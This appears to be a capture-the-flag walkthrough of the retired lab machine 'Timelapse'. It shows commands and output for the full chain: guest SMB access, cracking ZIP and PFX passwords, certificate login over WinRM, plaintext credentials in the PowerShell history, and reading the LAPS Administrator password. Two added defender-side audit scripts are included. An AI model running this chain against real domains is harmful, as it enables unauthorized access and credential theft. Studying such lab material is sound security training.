Easy · Windows · Active Directory · SMB · WinRM · LAPS · Retired
Timelapse
SMB guest access exposes a password-protected ZIP containing a PFX certificate. Cracking both gives a WinRM foothold as legacyy. PowerShell history reveals svc_deploy credentials — a member of LAPS_Readers — enabling direct Administrator password retrieval from Active Directory.
OS: Windows Server 2019
Role: Domain Controller
IP: 10.129.227.113
Techniques: SMB · PFX · LAPS · WinRM
User flag: 297fd26a1fxxxxxxxxxxxxxxxxxxxxxx
Root flag: 6eafa24ffaxxxxxxxxxxxxxxxxxxxxxx
Attack chain: SMB guest → winrm_backup.zip → PFX crack → legacyy (WinRM) → PS history → svc_deploy → LAPS_Readers → Administrator

01 Reconnaissance — Nmap

Full TCP scan with service detection. Port layout immediately signals a Domain Controller: Kerberos (88), LDAP (389/3268), SMB (445) — and crucially WinRM over SSL on port 5986 rather than the usual 5985.

nmap full scan
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.227.113
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Active Directory LDAP (Domain: timelapse.htb)
445/tcp  open  microsoft-ds?
5986/tcp open  ssl/wsmans?                                   <-- WinRM over SSL
| ssl-cert: Subject: commonName=dc01.timelapse.htb
9389/tcp open  mc-nmf        .NET Message Framing
clock-skew: mean: 8h00m02s                                   <-- sync if Kerberos auth needed
Takeaway: Port 5986 (WinRM/HTTPS) is open — certificate or credential-based login is possible. LAPS documentation in SMB confirms LAPS is deployed on this DC.
02 SMB Enumeration — Guest Access

Test for null/guest SMB access. The Shares share is readable without credentials.

netexec smb
$ nxc smb 10.129.227.113 -u 'guest' -p '' --shares
Share    Permissions
ADMIN$   (none)
C$       (none)
IPC$     READ
Shares   READ          <-- interesting
SYSVOL   (none)

Browse the Shares share with smbclient. Two subdirectories:

  • Dev/ — contains winrm_backup.zip
  • HelpDesk/ — contains LAPS installer and documentation (breadcrumb toward privesc)
smbclient
$ smbclient //10.129.227.113/Shares
smb: \> cd Dev
smb: \Dev\> ls
  winrm_backup.zip    A    2611
smb: \Dev\> get winrm_backup.zip
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
  LAPS.x64.msi
  LAPS_Datasheet.docx
  LAPS_OperationsGuide.docx
  LAPS_TechnicalSpecification.docx
LAPS note: LAPS stores randomised local admin passwords as the AD computer attribute ms-Mcs-AdmPwd. If we find a user with read permission on that attribute, we get the Administrator password.
03 Cracking the ZIP — zip2john

The ZIP is password-protected. Extract the hash with zip2john and crack with rockyou.

zip2john + john
$ zip2john winrm_backup.zip > zip.hash
ver 2.0 … winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk …
$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
Session completed.

The ZIP contains a single file: legacyy_dev_auth.pfx — a PKCS#12 certificate bundle. The filename leaks the username: legacyy.

unzip
$ unzip -P supremelegacy winrm_backup.zip
  inflating: legacyy_dev_auth.pfx
04 Cracking the PFX — pfx2john

A PFX file can have its own independent password. Trying the ZIP password fails, so we crack it separately.

pfx2john + john
$ pfx2john legacyy_dev_auth.pfx > pfx.hash
$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2)])
thuglegacy       (legacyy_dev_auth.pfx)
Session completed.

Extract the certificate and private key from the PFX using OpenSSL:

openssl extract
# Extract certificate (public)
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.crt -passin pass:thuglegacy
# Extract private key (no passphrase on output)
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out legacyy.key -passin pass:thuglegacy
05 WinRM Access as legacyy — User Flag

Authenticate to WinRM on port 5986 (SSL) using the extracted certificate and key. The -S flag forces SSL mode.

evil-winrm — cert auth
$ evil-winrm -i 10.129.227.113 -c legacyy.crt -k legacyy.key -S
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*EWR* cat C:\Users\legacyy\Desktop\user.txt
297fd26a1fxxxxxxxxxxxxxxxxxxxxxx

Check group membership — TIMELAPSE\Development stands out:

whoami /groups
*EWR* whoami /groups
BUILTIN\Remote Management Users               Enabled
TIMELAPSE\Development                         Enabled
Mandatory Label\Medium Plus Mandatory Level
06 Privilege Escalation — PowerShell History

Always check the PSReadLine history file early. It logs every command run in previous PowerShell sessions and is a frequent source of credentials on Windows boxes.

PSReadLine history
*PS* type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl …
get-aduser -filter * -properties *
exit
Credentials found: svc_deploy : E3R$Q62^12p7PLlC%KWaxuaV — hardcoded in plaintext inside a PowerShell session history file.
net user /domain
*EWR* net user /domain
Administrator   babywyrm   Guest   krbtgt   legacyy
payl0ad         sinfulz    svc_deploy   thecybergeek   TRX
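Added example, not part of the original writeup: a defender-side sweep of every profile's ConsoleHost_history.txt on a host for the credential patterns seen above (an inline ConvertTo-SecureString -AsPlainText, a PSCredential built from a literal, a password on the command line). The history path is the standard PSReadLine location; the indicator names and the masking rule are my own assumptions.

```powershell
# Added example (not from the original writeup). Run as a local admin so every
# user's history file is readable; quoted literals are masked in the report so the
# output itself does not leak the secret.
$patterns = @{
    'ConvertTo-SecureString -AsPlainText with literal' = "ConvertTo-SecureString\s+['""][^'""]+['""].*-AsPlainText"
    'PSCredential built from a literal'                = "PSCredential\s*\(\s*['""][^'""]+['""]\s*,"
    'Password passed on the command line'              = "(?:^|\s)(?:-p|-password|/password|--password)\s+\S+"
    'net user ... /add with password'                  = "^net\s+user\s+\S+\s+\S+\s+/add"
}

function Find-HistoryCredentials {
    param(
        # Default: the PSReadLine history of every local profile (assumed standard path)
        [string[]]$HistoryFiles = (Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue).FullName
    )
    foreach ($file in $HistoryFiles) {
        $lineNo = 0
        foreach ($line in Get-Content -Path $file -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($name in $patterns.Keys) {
                if ($line -match $patterns[$name]) {
                    # Replace the contents of any quoted string with *** before reporting
                    $masked = $line -replace "(['""])[^'""]{2,}\1", '$1***$1'
                    [pscustomobject]@{ File = $file; Line = $lineNo; Indicator = $name; Command = $masked }
                }
            }
        }
    }
}

Find-HistoryCredentials | Format-Table -AutoSize
```

Each hit is a credential that should be rotated, and the history file wiped, since anyone who lands in that profile gets it for free.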
07 Lateral Movement → svc_deploy + LAPS Read

Log in as svc_deploy and verify group membership. The LAPS_Readers group confirms this account can read the ms-Mcs-AdmPwd attribute from AD.

evil-winrm — svc_deploy
$ evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
*EWR* whoami /groups
TIMELAPSE\LAPS_Readers    Enabled
*EWR* Get-ADComputer DC01 -Properties ms-Mcs-AdmPwd | Select ms-Mcs-AdmPwd
ms-Mcs-AdmPwd
X-uBePA%n!&2C6-hZw63v5I,
How LAPS works: LAPS automatically rotates the local Administrator password on domain-joined machines and stores it as ms-Mcs-AdmPwd on the computer object in AD. Members of LAPS_Readers can read it via a single Get-ADComputer call.
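Added example, not part of the original writeup: a defender-side audit of who can actually read ms-Mcs-AdmPwd, run with the ActiveDirectory (RSAT) module on a domain member. It walks the ACL of every computer object and reports principals holding the ExtendedRight (CONTROL_ACCESS) bit on the attribute's schema GUID or on all extended rights, which is what reading a confidential attribute requires; the legacy LAPS module's Find-AdmPwdExtendedRights does the equivalent check per OU. Function name and output shape are my own.

```powershell
# Added example (not from the original writeup): enumerate LAPS password readers.
Import-Module ActiveDirectory

function Get-LapsReaders {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    # ms-Mcs-AdmPwd is a confidential attribute: reading it needs CONTROL_ACCESS
    # (ExtendedRight) scoped to the attribute's schema GUID, or "all extended rights".
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -Filter { name -eq 'ms-Mcs-AdmPwd' } -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd not in schema: legacy LAPS is not deployed in this domain' }
    $admPwdGuid = [guid]$attr.schemaIDGUID
    $allRights  = [guid]'00000000-0000-0000-0000-000000000000'
    $extRight   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

    Get-ADComputer -Filter * -SearchBase $SearchBase | ForEach-Object {
        $computer = $_.Name
        $acl = Get-Acl -Path ("AD:\" + $_.DistinguishedName)
        foreach ($ace in $acl.Access) {
            $hasControlAccess = ($ace.ActiveDirectoryRights -band $extRight) -ne 0
            if ($ace.AccessControlType -eq 'Allow' -and $hasControlAccess -and
                ($ace.ObjectType -eq $admPwdGuid -or $ace.ObjectType -eq $allRights)) {
                [pscustomobject]@{
                    Computer  = $computer
                    Principal = $ace.IdentityReference.Value
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Anything beyond Domain Admins and the intended reader group (here LAPS_Readers) is a finding.
Get-LapsReaders | Sort-Object Principal, Computer | Format-Table -AutoSize
```

On this box the output would show TIMELAPSE\LAPS_Readers against DC01; the question for a defender is whether a service account like svc_deploy belongs in that group at all.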
08 Root Flag — Administrator via LAPS

Use the retrieved LAPS password to authenticate directly as the local Administrator over WinRM. The root flag is in the TRX user's desktop — a quirk of this box's setup.

evil-winrm — Administrator
$ evil-winrm -i 10.129.227.113 -u Administrator -p 'X-uBePA%n!&2C6-hZw63v5I,' -S
*EWR* whoami
timelapse\administrator
*EWR* cat C:\Users\TRX\Desktop\root.txt
6eafa24ffaxxxxxxxxxxxxxxxxxxxxxx

TL;DR: Key Lessons
01 — hash everything: ZIP and PFX containers have independent passwords. Always run zip2john / pfx2john and try rockyou before moving on.
02 — check PS history immediately: ConsoleHost_history.txt under PSReadLine is one of the first things to check post-foothold on any Windows box. Credentials in session history are extremely common.
03 — LAPS_Readers = game over: If a compromised account is in LAPS_Readers, a single AD query retrieves the local Administrator password. Always enumerate group memberships and check LAPS exposure.